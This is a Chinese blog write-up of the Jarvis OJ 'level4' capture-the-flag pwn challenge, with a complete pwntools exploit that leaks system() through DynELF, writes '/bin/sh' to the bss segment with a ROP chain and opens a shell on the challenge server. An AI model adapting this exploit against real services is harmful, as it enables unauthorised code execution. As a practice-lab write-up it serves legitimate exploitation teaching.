jarvis oj level4 wp

最新推荐文章于 2023-04-08 14:44:07 发布
最新推荐文章于 2023-04-08 14:44:07 发布
阅读量367 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pppp974/article/details/96427097
版权

先简单看一下代码
在这里插入图片描述
在这里插入图片描述
很容易发现这是一个栈溢出,此题考虑使用DynELF来获取system函数的位置,然后使用read将’bin/sh’写入bss段之中,最后通过栈溢出进行调用。exp如下。

#!/usr/bin/env python
from pwn import *

elf = ELF('./level4')
plt_write = elf.symbols['write']
plt_read = elf.symbols['read']
vulfun_addr = 0x0804844b

def leak(address):
    payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(address) + p32(4)
    p.send(payload1)
    data = p.recv(4)
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data

p = remote('pwn2.jarvisoj.com',9880)

d = DynELF(leak, elf=ELF('./level4'))

system_addr = d.lookup('system', 'libc')    此处查找system函数的位置
print "system_addr=" + hex(system_addr)


bssadr=elf.symbols['__bss_start']
pppr = 0x08048509   这是三个pop和一个ret的位置

payload2 = 'a'*140  + p32(plt_read) + p32(pppr) + p32(0) + p32(bssadr) + p32(8) 
payload2 += p32(system_addr) + p32(32) + p32(bssadr)       注意在调用了read函数之后,
由于read函数有三个参数,需要三个pop进行栈平衡

print "\n###sending payload2 ...###"
p.send(payload2)
p.send("/bin/sh\0")

p.interactive()
gone too soon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jarvis OJ --level4
Kni9hT's Blog
11-11 243
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 396
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
jarvisoj_level4
个人笔记
04-08 129
思路:ret2libc,泄露_write来获取Libc基址。3,IDA静态查看是否有ret利用点。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis音频.zip
07-31
此外,压缩包内还包含了多个以贾维斯为主题的音频文件,如"I是贾维斯.m4a",这可能是贾维斯自我介绍的音频片段,让你在聆听的同时仿佛置身于电影情节之中。还有各种不同场景下的音频文件,如"JARVIS_电话呼入.m4r",...
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
jarvis oj 神盾局的秘密 wp
欢迎来到神林的博客
09-12 379
jarvis oj 中的反序列化 收集信息: 发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php ...
BUUCTF-jarvisoj_level4
Rt1Text的博客
12-04 168
很明显的栈溢出,没有system(bin/sh) 32位的ret2libc3老规矩的脚本
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 509
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 414
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
jarvis oj level3/level4--多种解法实现ret2libc
超人学飞的日子
04-09 779
level3和level4都是ret2libc的典型题目,只不过level3给了libc文件而level4没有给。 这里以leve3为例,使用多种方式实现ret2libc 一,使用给定的libc文件,计算偏移地址 整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行 基础原理:http://ww...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
[Jarvis OJ - PWN]——[XMAN]level4
Y_peak的博客
02-16 210
[Jarvis OJ - PWN]——[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x100 - 0x88 = 120, 多余的空间足够我们进行栈溢出利用 但是我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。 e
Jarvis OJ 逆向工程部分WP
qq_42192672的博客
09-08 715
RE 1. androideasy 这题我做了一个比较详细(呆)的wp,给个链接:https://blog.csdn.net/qq_42192672/article/details/82528782 2. DD - Android Easy 怎么反编译成JAVA代码的过程第一题已经给出了,就不多做赘述了 分析一下,首先定义一个arryOfByte1数组,每个元素是p数组与q数组每个元...
攻防世界Mary_Morton wp
苗_的博客
10-13 276
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值